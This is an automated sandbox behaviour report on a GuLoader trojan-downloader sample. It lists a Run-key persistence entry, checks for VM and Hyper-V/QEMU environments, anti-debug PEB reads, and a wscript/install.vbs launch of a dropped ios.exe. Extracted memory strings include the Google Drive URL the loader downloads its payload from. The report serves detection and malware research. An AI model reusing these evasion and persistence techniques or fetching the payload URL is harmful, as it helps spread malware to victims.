Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ahw
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\AppData\Roaming\ios.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Roaming\ios.exe File opened: C:\Program Files\qga\qga.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16-ZMAFJETZH9DABQOP0U2ZSQ7P2C4WZM
Source: C:\Users\user\AppData\Roaming\ios.exe TID: 8640 Thread sleep count: 241 > 30
Source: C:\Users\user\AppData\Roaming\ios.exe TID: 1960 Thread sleep count: 514 > 30
Source: C:\Users\user\AppData\Roaming\ios.exe TID: 1960 Thread sleep time: -257000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ios.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-release.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DiFxAPI.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\portaudio_x64.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7960 rdtsc 0_2_032C7960
Source: C:\Users\user\AppData\Roaming\ios.exe Window / User API: threadDelayed 514
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: K32EnumDeviceDrivers, 0_2_032D4010
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 25_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040290B FindFirstFileW, 25_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040699E FindFirstFileW,FindClose, 25_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 26_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040290B FindFirstFileW, 26_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040699E FindFirstFileW,FindClose, 26_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\ios.exe API call chain: ExitProcess graph end node
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: CompanyNameVMware, Inc.j!
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: http://www.vmware.com/0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.1!0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: http://www.vmware.com/0/
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323318940.0000000001996000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1322818122.0000000001938000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.1
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: VMware, Inc.0
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: ProductNameVMware SVGA 3D`
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: ?dbghelp.dllSoftware\VMware, Inc.\VMware SVGADebugSearchPathBacktrace[%2d] rip=%p %s+%#x %s:%d
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323318940.0000000001996000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW]
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: LegalCopyrightCopyright (C) 1998-2021 VMware, Inc.Z
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: noreply@vmware.com0
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: FileDescriptionVMware SVGA 3D Device API Module:
Source: ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm
Source: ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: Software\VMware, Inc.\VMware SVGA
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F7C1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CA5B0 mov eax, dword ptr fs:[00000030h] 0_2_032CA5B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C61B3 mov eax, dword ptr fs:[00000030h] 0_2_032C61B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D2BF7 mov eax, dword ptr fs:[00000030h] 0_2_032D2BF7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CAC1C mov ebx, dword ptr fs:[00000030h] 0_2_032CAC1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CAC1C mov eax, dword ptr fs:[00000030h] 0_2_032CAC1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D187E mov eax, dword ptr fs:[00000030h] 0_2_032D187E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D10E6 mov eax, dword ptr fs:[00000030h] 0_2_032D10E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CE2DD mov eax, dword ptr fs:[00000030h] 0_2_032CE2DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 mov ebx, dword ptr fs:[00000030h] 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 mov eax, dword ptr fs:[00000030h] 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663E9F mov eax, dword ptr fs:[00000030h] 8_2_01663E9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166829C mov eax, dword ptr fs:[00000030h] 8_2_0166829C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F56A mov eax, dword ptr fs:[00000030h] 8_2_0166F56A
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166BFC9 mov eax, dword ptr fs:[00000030h] 8_2_0166BFC9
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166EDD2 mov eax, dword ptr fs:[00000030h] 8_2_0166EDD2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016708E3 mov eax, dword ptr fs:[00000030h] 8_2_016708E3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F61B3 mov eax, dword ptr fs:[00000030h] 25_2_032F61B3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FA5B0 mov eax, dword ptr fs:[00000030h] 25_2_032FA5B0
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03302BF7 mov eax, dword ptr fs:[00000030h] 25_2_03302BF7
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FAC1C mov ebx, dword ptr fs:[00000030h] 25_2_032FAC1C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FAC1C mov eax, dword ptr fs:[00000030h] 25_2_032FAC1C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0330187E mov eax, dword ptr fs:[00000030h] 25_2_0330187E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_033010E6 mov eax, dword ptr fs:[00000030h] 25_2_033010E6
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FE2DD mov eax, dword ptr fs:[00000030h] 25_2_032FE2DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\ios.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C79FF LdrInitializeThunk, 0_2_032C79FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managervider
Source: ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrthur
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerMx
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27V
Source: ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\J{
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\ y
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\_x
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5718341347.000000000185E000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
